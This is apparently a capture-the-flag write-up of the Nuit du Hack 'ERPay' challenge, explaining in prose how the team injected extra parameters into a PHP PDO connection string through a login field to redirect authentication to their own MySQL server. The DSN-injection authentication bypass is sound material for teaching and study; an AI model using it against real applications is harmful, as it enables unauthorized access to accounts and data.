ERPay is a new ERP management application. You can now steal money from your employees and add the money directly on your bank account !
This challenge was pretty cool, even if we were stucked on it during a long time 🙂
By going on whyunoknock.nuitduhack.com, we can see a login page. Obviously, the thing was to bypass this page 🙂
We checked the paramaters sent to the server with Burp and tried some classic tests, like, you know, SQL Injection ^^
These tests were pretty useless because there is no injection at all, but at this time, we didn’t knew it.
Our tests were mainly based on the group parameter. By changing it, the server replied us with some error numbers.
By checking the error on the interwebs, we can see that error 1044 is when we try to connect to an inexistant base.
Well… that’s pretty obvious, because we actually try to connect to a base named “fake” x)
The interesting thing here is that playing with the group parameter gives us PDOException.
Moreover, during our tests, we saw that sending “users;” to the server didn’t replied us with some “STAHP DOING DUMB THINGS” Exception.
Well well well… “;” doesn’t crash, we have some PDO Exceptions… We dediced to check the PHP doc for the PDO class.
The constructor is defined as follow:
public PDO::__construct ( string $dsn [, string $username [, string $password [, array $options ]]] )
$dsn is a string containing SQL information, like the database name or the host. This string looks like this :
Oh. Wait. What? Did you saw it? The vuln! It’s here! In front of us! Since the beginning!
The group that we send in the auth request. It’s obviously the dbname!
So… If we try to inject more parameters into the dsn ? Like, for example… a specific host!
Hmmm… Exception 2002… “Can’t connect to Mysql Server” As 18.104.22.168 doesn’t have a mysql instance, it seems legit 🙂
But we now know how to pwn the authentication! We just need to set a mysql instance and let the script connect to it.
After some network configuration, our mysql service was up and running, waiting for any connection 🙂
By setting the host to our IP, we saw the script trying to authenticate on our instance (as there is some NAT on our network, the IP of the webserver is 192.168.1.254 and the mysql instance IP is 192.168.1.100)
Wonderful! We now can create an erpay user, and after some configuration, we saw the auth query coming.
The last step was to create a table named logins, with three columns: id, login, and password.
OK, now, everthing is set up, we just have to send the authentication request to the web server, and here it is!
The flag came to us 🙂